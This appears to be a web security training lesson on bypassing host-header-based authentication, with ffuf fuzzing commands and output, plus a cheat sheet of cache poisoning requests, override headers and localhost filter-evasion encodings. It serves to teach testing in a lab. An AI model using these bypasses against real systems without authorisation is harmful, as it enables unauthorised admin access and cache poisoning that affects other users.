Abusing HTTP Misconfigurations

Authentication Bypass

Exploiting host header attacks is not trivial in most cases. For some host header attacks, we need to understand how the web application works, how it uses the host header, and which values we need to inject to bypass checks.

In our first host header attack example, we will have a look at a simple vulnerable web application that conducts an authentication check based on the host header.

Identification & Exploitation

When accessing the web application, we can see a simple website with an admin area:

However, when we attempt to access the admin area at /admin.php, we notice that we are unauthorized to do so:

The web application displays an error that states The admin area can only be accessed locally!. That warning is phrased in a way that seems to indicate that the admin area can only be accessed from the internal network of the web application. Now we could ask ourselves: how does the web application check whether a request comes from an internal network or an external source?

The most obvious and secure option would be to check the IP address of the request. This can be done in PHP using the $_SERVER['REMOTE_ADDR'] variable. This might create issues if the site sits behind a reverse proxy though. Another way would be to check the host header, however, this leaves the web application vulnerable to host header attacks.

When we set the host header to localhost, indicating that the website was accessed locally, we can bypass the authentication check and access the admin area:

Fuzzing

If the web application accepts only specific IPs of an internal network, manual testing is impossible because of the large number of IP private addresses. However, we can fuzz the host header to check if we can bypass the authentication check. For instance, if we want to create a wordlist of the 192.168.0.0-192.168.255.255 private IP address range, we could use a bash script similar to the following:

for a in {1..255};do
    for b in {1..255};do
        echo "192.168.$a.$b" >> ips.txt
    done
done

We can then use a fuzzer like ffuf to fuzz the host header for IP addresses that bypass the host header check:

[!bash!]$ ffuf -u http://IP:PORT/admin.php -w ips.txt -H 'Host: FUZZ' -fs 752
                                                                                               
        /'___\  /'___\           /'___\                                                        
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.4.1-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://IP:PORT/admin.php
 :: Wordlist         : FUZZ: ips.txt
 :: Header           : Host: FUZZ
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response size: 752
________________________________________________

192.168.178.28          [Status: 200, Size: 747, Words: 49, Lines: 36, Duration: 0ms]
192.168.178.32          [Status: 200, Size: 747, Words: 49, Lines: 36, Duration: 0ms]
192.168.178.156         [Status: 200, Size: 747, Words: 49, Lines: 36, Duration: 0ms]

For more information on fuzzing with ffuf, have a look at this module.

/ 1 spawns left

Waiting to start...

Questions

Answer the question(s) below to complete this Section and earn cubes!

Target: Click here to spawn the target system!

+ 5 Try to use what you learned in this section to bypass the authentication check via host header manipulation and obtain the flag.

+10 Streak pts

Previous Next

Go to Questions

Introduction to HTTP Misconfigurations

My Workstation

OFFLINE

/ 1 spawns left

Cheat Sheet

The cheat sheet is a useful command reference for this module.

Web Cache Poisoning - General

Identify a way to determine keyed & unkeyed parameters
Use Cache Buster to prevent poisoning other users
Deliver payload in unkeyed parameter to poison the cache

Web Cache Poisoning - Fat GET

GET requests with body
Web server may be vulnerable if it does not ignore the body
Can be used to poison the cache even with a keyed parameter
Example:

GET /index.php?param1=Hello&param2=World HTTP/1.1
Host: 127.0.0.1
Content-Length: 10

param3=123

Web Cache Poisoning - Parameter Cloaking

Discrepancy in the parsing of parameters between web cache and web server
Can be used to poison the cache even with a keyed parameter
Payload needs to be hidden in unkeyed parameter
Example:

GET /?language=en&a=b;language=de HTTP/1.1
Host: 127.0.0.1

Web Cache Poisoning Scanner

Command	Description
`./wcvs -u http://simple.wcp.htb/`	Simple scan of a website
`./wcvs -u http://simple.wcp.htb/ -gr`	Generate a JSON report

Host Header Attacks

Override Headers:

X-Forwarded-Host
X-HTTP-Host-Override
Forwarded
X-Host
X-Forwarded-Server

Generating a wordlist for Fuzzing:

for a in {1..255};do
    for b in {1..255};do
        echo "192.168.$a.$b" >> ips.txt
    done
done

Using ffuf to fuzz the host header:

ffuf -u http://IP:PORT/admin.php -w ips.txt -H 'Host: FUZZ'

Bypassing blacklist filters for localhost:

Decimal encoding: 2130706433
Hex encoding: 0x7f000001
Octal encoding: 0177.0000.0000.0001
Zero: 0
Short form: 127.1
IPv6: ::1
External domain that resolves to localhost: localtest.me

Session Puzzling

Session IDs should be at least 16 bytes long
Session IDs should provide at least 64 bits of entropy
Test for insecure default values in session variables
Test for common session variables/session variable re-use across different processes
Test for premature session population of session variables by canceling/manipulating processes unexpectedly